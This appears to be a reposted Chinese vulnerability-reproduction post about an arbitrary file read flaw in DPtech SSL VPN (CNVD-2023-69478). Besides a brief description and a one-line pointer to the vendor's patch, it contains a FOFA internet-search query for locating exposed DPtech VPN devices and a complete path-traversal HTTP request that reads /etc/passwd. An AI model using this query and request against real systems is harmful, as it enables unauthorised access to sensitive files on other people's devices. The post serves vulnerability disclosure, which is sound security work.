漏洞复现-迪普DPTech VPN 任意文件读取
2023-11-16 09:22:54 Author: 网络安全交流圈(查看原文) 阅读量:123 收藏

一、漏洞描述
 公开日期:2023-10-06
 漏洞编号:CNVD-2023-69478
 危害等级:高危
漏洞描述:杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。

二、漏洞影响产品
杭州迪普科技股份有限公司DPtech SSL VPN

三、网络空间测绘查询

fofa:
title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"

利用报文:

GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: xxxxxxxxxCookie: SSLVPN_lang=1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close

四、漏洞修复:

厂商已提供漏洞修补方案,请关注厂商主页及时更新:http://www.dptech.com/

欢迎添加微信进行业务咨询:

承接以下业务:


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247485111&idx=1&sn=cb5ba426ae1fa44a793870886ca3b912&chksm=e9fb4190de8cc88679c68447d39406a31b3fe5b76c98c6e937e2cf1d250c006e309dc393b428&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh